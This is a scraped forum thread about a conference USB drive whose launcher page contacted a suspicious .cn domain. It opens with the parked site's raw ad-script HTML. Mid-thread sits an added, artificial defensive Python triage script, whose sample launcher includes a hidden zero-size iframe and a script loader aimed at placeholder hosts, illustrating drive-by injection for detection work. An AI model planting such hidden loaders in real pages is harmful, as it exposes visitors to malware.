cpro_id="u2578824";(window["cproStyleApi"]=window["cproStyleApi"]||{})[cpro_id]={at:"3",rsi0:"480",rsi1:"180",pat:"6",tn:"baiduCustNativeAD",rss1:"#FFFFFF",conBW:"0",adp:"1",ptt:"0",titFF:"%E5%BE%AE%E8%BD%AF%E9%9B%85%E9%BB%91",titFS:"14",rss2:"#000000",titSU:"0",ptbg:"90",piw:"220",pih:"155",ptp:"0"}</script><script src="http://cpro.baidustatic.com/cpro/ui/c.js"type="text/javascript"></script></div><div class="fl"><!--u2578836#pd.dopa.com.cn#首页-3p纯文本下右边图片广告创建于2016-03-28--><script type="text/javascript">var cpro_id="u2578836";(window["cproStyleApi"]=window["cproStyleApi"]||{})[cpro_id]={at:"3",rsi0:"710",rsi1:"180",pat:"6",tn:"baiduCustNativeAD",rss1:"#FFFFFF",conBW:"0",adp:"1",ptt:"0",titFF:"%E5%BE%AE%E8%BD%AF%E9%9B%85%E9%BB%91",titFS:"14",rss2:"#000000",titSU:"0",ptbg:"90",piw:"220",pih:"155",ptp:"0"}</script><script src="http://cpro.baidustatic.com/cpro/ui/c.js"type="text/javascript"></script></div><div class="clearfix"></div></div></div></div></div><!--社会动态end--><div class="layout"><div class="mt20"style="height:35px;"><!--u2578848#pd.dopa.com.cn#首页-3p单独纯文本广告创建于2016-03-28--><script type="text/javascript">var cpro_id="u2578848";(window["cproStyleApi"]=window["cproStyleApi"]||{})[cpro_id]={at:"3",rsi0:"1198",rsi1:"35",pat:"3",tn:"baiduCustNativeAD",rss1:"#FFFFFF",conBW:"1",adp:"1",ptt:"0",titFF:"%E5%BE%AE%E8%BD%AF%E9%9B%85%E9%BB%91",titFS:"14",rss2:"#000000",titSU:"0",tft:"0",tlt:"1"}</script><script src="http://cpro.baidustatic.com/cpro/ui/c.js"type="text/javascript"></script></div></div><div class="layout"><div style="border:1px solid #ddd;"class="mt20"><div class="fl"><!--u2578859#pd.dopa.com.cn#首页-3p左图片广告创建于2016-03-28--><script type="text/javascript">var 
cpro_id="u2578859";(window["cproStyleApi"]=window["cproStyleApi"]||{})[cpro_id]={at:"3",rsi0:"599",rsi1:"200",pat:"6",tn:"baiduCustNativeAD",rss1:"#FFFFFF",conBW:"0",adp:"1",ptt:"0",titFF:"%E5%BE%AE%E8%BD%AF%E9%9B%85%E9%BB%91",titFS:"14",rss2:"#000000",titSU:"0",ptbg:"90",piw:"180",pih:"160",ptp:"0"}</script><script src="http://cpro.baidustatic.com/cpro/ui/c.js"type="text/javascript"></script></div><div class="fl"><!--u2578868#pd.dopa.com.cn#首页-3p右图片广告创建于2016-03-28--><script type="text/javascript">var cpro_id="u2578868";(window["cproStyleApi"]=window["cproStyleApi"]||{})[cpro_id]={at:"3",rsi0:"599",rsi1:"200",pat:"6",tn:"baiduCustNativeAD",rss1:"#FFFFFF",conBW:"0",adp:"1",ptt:"0",titFF:"%E5%BE%AE%E8%BD%AF%E9%9B%85%E9%BB%91",titFS:"14",rss2:"#000000",titSU:"0",ptbg:"90",piw:"180",pih:"160",ptp:"0"}</script><script src="http://cpro.baidustatic.com/cpro/ui/c.js"type="text/javascript"></script></div><div class="clearfix"></div></div></div><div class="layout"><div class="mt20"><div class="fl"><!--u2578882#pd.dopa.com.cn#首页-4p标签云广告580*90创建于2016-03-28--><script type="text/javascript">var cpro_id="u2578882";</script><script src="http://cpro.baidustatic.com/cpro/ui/c.js"type="text/javascript"></script></div><div class="fl"style="margin-left:20px;"><!--u2578892#pd.dopa.com.cn#首页-4p图片图文广告580*90创建于2016-03-28--><script type="text/javascript">var cpro_id="u2578892";</script><script src="http://cpro.baidustatic.com/cpro/ui/c.js"type="text/javascript"></script></div><div class="clearfix"></div></div></div><div class="layout"><div class="mt20"><div class="fl"><!--u2578908#pd.dopa.com.cn#首页-4p左橱窗广告创建于2016-03-28--><script type="text/javascript">var cpro_id="u2578908";(window["cproStyleApi"]=window["cproStyleApi"]||{})[cpro_id]={at:"3",rsi0:"300",rsi1:"250",pat:"17",tn:"baiduCustNativeAD",rss1:"#FFFFFF",conBW:"1",adp:"1",ptt:"0",titFF:"%E5%BE%AE%E8%BD%AF%E9%9B%85%E9%BB%91",titFS:"",rss2:"#000000",titSU:"0"}</script><script 
src="http://cpro.baidustatic.com/cpro/ui/c.js"type="text/javascript"></script></div><div class="fl"><!--u2578918#pd.dopa.com.cn#首页-4p图片广告1创建于2016-03-28--><script type="text/javascript">var cpro_id="u2578918";(window["cproStyleApi"]=window["cproStyleApi"]||{})[cpro_id]={at:"3",rsi0:"300",rsi1:"250",pat:"6",tn:"baiduCustNativeAD",rss1:"#FFFFFF",conBW:"1",adp:"1",ptt:"0",titFF:"%E5%BE%AE%E8%BD%AF%E9%9B%85%E9%BB%91",titFS:"",rss2:"#000000",titSU:"0",ptbg:"90",piw:"130",pih:"90",ptp:"0"}</script><script src="http://cpro.baidustatic.com/cpro/ui/c.js"type="text/javascript"></script></div><div class="fl"><!--u2578924#pd.dopa.com.cn#首页-4p图片广告2创建于2016-03-28--><script type="text/javascript">var cpro_id="u2578924";(window["cproStyleApi"]=window["cproStyleApi"]||{})[cpro_id]={at:"3",rsi0:"300",rsi1:"250",pat:"6",tn:"baiduCustNativeAD",rss1:"#FFFFFF",conBW:"1",adp:"1",ptt:"0",titFF:"%E5%BE%AE%E8%BD%AF%E9%9B%85%E9%BB%91",titFS:"",rss2:"#000000",titSU:"0",ptbg:"90",piw:"130",pih:"90",ptp:"0"}</script><script src="http://cpro.baidustatic.com/cpro/ui/c.js"type="text/javascript"></script></div><div class="fl"><!--u2578929#pd.dopa.com.cn#首页-4p右橱窗广告创建于2016-03-28--><script type="text/javascript">var cpro_id="u2578929";(window["cproStyleApi"]=window["cproStyleApi"]||{})[cpro_id]={at:"3",rsi0:"300",rsi1:"250",pat:"17",tn:"baiduCustNativeAD",rss1:"#FFFFFF",conBW:"1",adp:"1",ptt:"0",titFF:"%E5%BE%AE%E8%BD%AF%E9%9B%85%E9%BB%91",titFS:"",rss2:"#000000",titSU:"0"}</script><script src="http://cpro.baidustatic.com/cpro/ui/c.js"type="text/javascript"></script></div><div class="clearfix"></div></div></div><div class="layout"><div class="mt20"><div class="fl"style="width:280px;"><div style="margin-left:15px;"><!--u2578989#pd.dopa.com.cn#首页-4p搜索推荐右边图文广告250*250创建于2016-03-28--><script type="text/javascript">var cpro_id="u2578989";</script><script src="http://cpro.baidustatic.com/cpro/ui/c.js"type="text/javascript"></script></div></div><div 
class="fl"style="width:640px;"><!--u2578996#pd.dopa.com.cn#首页-4p搜索推荐--><script type="BAIDU_HH">{di:"u2578996",fixed_tpl:"1",type:"pageembed",version:"110",rsi0:"640",rsi1:"60"}</script><script>if(typeof BAIDU_SS_HHRUN!='function'){with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://su.bdimg.com/static/dspui/js/ls.js?v='+~(-new Date()/5600e5)]}else{BAIDU_SS_HHRUN()}</script><!--u2582973#pd.dopa.com.cn-底部搜索下图文广告640*190创建于2016-03-31--><script type="text/javascript">var cpro_id="u2582973";(window["cproStyleApi"]=window["cproStyleApi"]||{})[cpro_id]={at:"3",rsi0:"640",rsi1:"190",pat:"1",tn:"baiduCustNativeAD",rss1:"#FFFFFF",conBW:"1",adp:"1",ptt:"0",titFF:"%E5%BE%AE%E8%BD%AF%E9%9B%85%E9%BB%91",titFS:"14",rss2:"#000000",titSU:"0",tft:"0",tlt:"1",ptbg:"90",piw:"0",pih:"0",ptp:"1"}</script><script src="http://cpro.baidustatic.com/cpro/ui/c.js"type="text/javascript"></script></div><div class="fl"style="width:280px;"><div style="margin-left:15px;"><!--u2578983#pd.dopa.com.cn#首页-4p搜索推荐左边图片广告250*250创建于2016-03-28--><script type="text/javascript">var cpro_id="u2578983";</script><script src="http://cpro.baidustatic.com/cpro/ui/c.js"type="text/javascript"></script></div></div><div class="clear"></div></div></div></div><div class="clearfix"></div><div id="footer"><div class="footer-line"></div><div class="footer-cont"><div class="footer-detail"><div style="width:150px; margin:auto; height: 35px; background-color: #f60;text-align:center;"><a style="font-weight: bold; line-height: 35px; font-size:16px; color:#fff;"href="http://www.yumi.com/domain/ntkrnlpa.cn"target="_blank">委托购买此域名</a></div></div><div class="footer-detail copyright">Copyright©2016ntkrnlpa.cn.all rights reserved.</div></div></div><div class="container"style=" display:none; text-align:center; color:#999999; line-height:45px;"><div class="clearfix"></div>Copyright©2016 ntkrnlpa.cn All Rights Reserved</div></body></html><script>
var _hmt = _hmt || [];
(function() {
var hm = document.createElement("script");
hm.src = "//hm.baidu.com/hm.js?3479a5f75a570881e9ca33f4e0015f8b";
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(hm, s);
})();
</script><span style="display:none;">80349000:2016-04-23 18:44:00</span>
Domain parking: » domaingang.com/domain-ne ··· pamming/ (Mentioned this in 2014.) » sitecheck.sucuri.net/res ··· a.cn/rc/

dave · Premium Member · join:2000-05-04 · not in ohio
2016-Apr-23 10:01 pm · to Mike
Any other references to this problem?

I'm thinking I ought to alert my dentist to this (mostly as an act of self-protection) and, while your analysis is good enough for me, I'm wondering if there was some sort of more official report on this I should use.

Basically, I'm supposing that the response to me will be of the form "who sez so?". I'd probably do the same in her position.

norwegian · Premium Member · join:2005-02-15 · Outback · 1 edit
2016-Apr-23 10:39 pm
It's a bit hard to clarify. The domain parking host might have a little to do with it, and some URL scans warn, yet this scan says some of the sites I've checked are fine with it:

pd.dopa.com.cn
cpro.baidustatic.com
Baidu.com
Baidustatic.com
su.bdimg.com
Yumi.com

And hence why this URL scan says some of the listed URL checks above are clean, but, as you see in the images previously posted, they are picking up something.

Edit: A better record of the URL: » urlquery.net/report.php? ··· 64784717

trparky · Premium Member · join:2000-05-24 · Cleveland, OH
to Mike

How the hell did this pass quality control?

Snowy · Lock him up!!! · Premium Member · join:2003-04-05 · Kailua, HI · 6 recommendations
2016-Apr-23 11:02 pm
said by trparky: How the hell did this pass quality control?

1. The drive fit the USB port.
2. The expected content was present/properly formatted.

Having confirmed that, what could possibly go wrong? They obviously put more effort into proofreading than security.
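Mike's first move was to read the launcher's source on a spare machine rather than open it, and Snowy's point is that the QA on the ADA's side only checked that the expected content rendered. The script below is an added example for this thread, not code from the original posts, from the ADA or from the USB stick: it does the pass Mike did by hand, listing every resource an HTML launcher would fetch from outside the folder it shipped in (iframe, script, link, img and similar tags, plus URL literals inside inline script, including the protocol-relative "//host/..." form the parked page's hm.js beacon uses). The sample launcher, the host names in it and the file name triage_launcher.py are constructed for the example; the real launcher's off-disk reference is the .cn domain discussed in the thread, which is deliberately not reproduced here.

```python
"""Static triage of an untrusted HTML launcher before anyone double-clicks it."""
import re
import sys
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Tag/attribute pairs that make a browser fetch something as soon as the page loads.
FETCH_ATTRS = {
    "script": ("src",), "iframe": ("src",), "frame": ("src",),
    "link": ("href",), "img": ("src",), "embed": ("src",),
    "object": ("data",), "form": ("action",),
}

# URL literals inside inline script, including protocol-relative "//host/path"
# loaders like the hm.js beacon appended at the bottom of the parked page.
URL_RE = re.compile(r"""(?:https?:)?//[A-Za-z0-9.-]+\.[A-Za-z]{2,}[^\s'"<>]*""")


def is_remote(url):
    """True if the reference leaves the folder the launcher shipped in."""
    u = url.strip()
    if u.startswith("//"):
        return True
    return urlsplit(u).scheme.lower() in ("http", "https", "ftp")


def host_of(url):
    """Host name of an absolute or protocol-relative URL ('' if none)."""
    u = url.strip()
    if u.startswith("//"):
        u = "http:" + u
    return urlsplit(u).hostname or ""


class RemoteRefFinder(HTMLParser):
    """Collects (kind, host, url) for every off-disk reference in the markup."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_inline_script = False

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        for name in FETCH_ATTRS.get(tag, ()):
            url = attrs.get(name)
            if url and is_remote(url):
                self.findings.append((tag, host_of(url), url.strip()))
        # Only a <script> without src has a body worth regex-scanning.
        self._in_inline_script = tag == "script" and not attrs.get("src")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_inline_script = False

    def handle_data(self, data):
        if self._in_inline_script:
            for m in URL_RE.finditer(data):
                self.findings.append(("inline-script", host_of(m.group(0)), m.group(0)))


def remote_references(html):
    """All off-disk references, in document order."""
    p = RemoteRefFinder()
    p.feed(html)
    p.close()
    return p.findings


def remote_hosts(html):
    """Distinct external hosts the page would contact, sorted for a blocklist or a lookup."""
    return sorted({host for _, host, _ in remote_references(html) if host})


# Constructed sample mirroring the launcher's layout (local favicon, stylesheet and
# jQuery) plus two off-disk references; the hosts are placeholders, not the real domain.
SAMPLE_LAUNCHER = """<!DOCTYPE html>
<html><head><title>CDT 2016</title>
<link rel="icon" href="Media/images/favicon.ico" type="image/x-icon" />
<link rel="stylesheet" media="screen" href="style.css">
<script src="Media/js/jquery-1.10.1.min.js"></script>
<script>
var hm = document.createElement("script");
hm.src = "//stats.example.invalid/hm.js?id=1";
document.getElementsByTagName("head")[0].appendChild(hm);
</script>
</head><body>
<div id="container"><img src="Media/images/cover.jpg"></div>
<iframe src="http://parked.example.invalid/rc/" width="0" height="0"></iframe>
</body></html>
"""

if __name__ == "__main__":
    # Usage: python triage_launcher.py [path/to/index.html]; defaults to the sample.
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            html = fh.read()
    else:
        html = SAMPLE_LAUNCHER
    for kind, host, url in remote_references(html):
        print(f"{kind:14} {host:30} {url}")
    # No findings means "nothing obvious in the markup", not "clean": a loader that
    # assembles its host name at runtime never appears as a literal URL.
```

Run it against a copy of the launcher taken from the stick on a throwaway machine, and feed the hosts it prints to the URL scanners people in this thread are already using. Two caveats a practitioner would want: the parser only sees what is literally in the file, so obfuscated JavaScript that builds a URL from pieces slips past the regex, and an empty report says nothing about the USB device itself, which is the separate BadUSB worry raised further down.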
2 recommendations · to Mike
Well, I tried to download the payload using Wget and got a "Malicious website blocked!". I have a DNS proxy server, and I send the .cn, .fm and .ru URLs to Norton's ConnectSafe, which blocks this domain. I think I'll code a few more overseas domains over to Norton's.

My other thought is, there is that "BadUSB" defect. That's why I'm wary now of plugging in any new USB device. I'd be interested in a USB card I could add to the PCIe slot that takes a hardened approach to USB, just for these kinds of situations.

Bill_MI · Bill In Michigan · MVM · join:2001-01-03 · Royal Oak, MI · 2 edits

I think the original post is responsible for the Avast alarms, but pulling this one anyway.

SipSizzurp · Fo' Shizzle · Premium Member · join:2005-12-28 · Houston, TX · 2 recommendations
to Mike
Looks like this has been around for a while. I Googled the entire iframe line and get 600 hits on Google. One was this coding forum talking about the same iframe back in 2009. https://www.namepros.com/threads/check-your-web-pages-again.540690/

WordPress warning from 4 years ago. https://wordpress.org/support/topic/a-virus-warning-to-visitors

I'm running Deep Freeze and am not afraid of viruses. What should I look for at the infected page?

SipSizzurp
If I did get an infection there was no obvious clue. Here is the main page, which has a lot of interesting links. Then screenshots from 3 of the linked pages. Chrome translated some of the stuff. Maybe I'll get lucky and find some porn in there.....

norwegian · Premium Member · join:2005-02-15 · Outback

In the urlquery link there is an upload function at the end for static.flv.uuzuonline.com? Looking up VirusTotal shows a few malware examples utilizing the domain, all from this year? » www.virustotal.com/en/do ··· rmation/

I did notice though, in the code I posted, the first thing was to check for versions of IE, so maybe there is a function that works once a weak version of IE is detected?

therube · join:2004-11-11 · Randallstown, MD
to Mike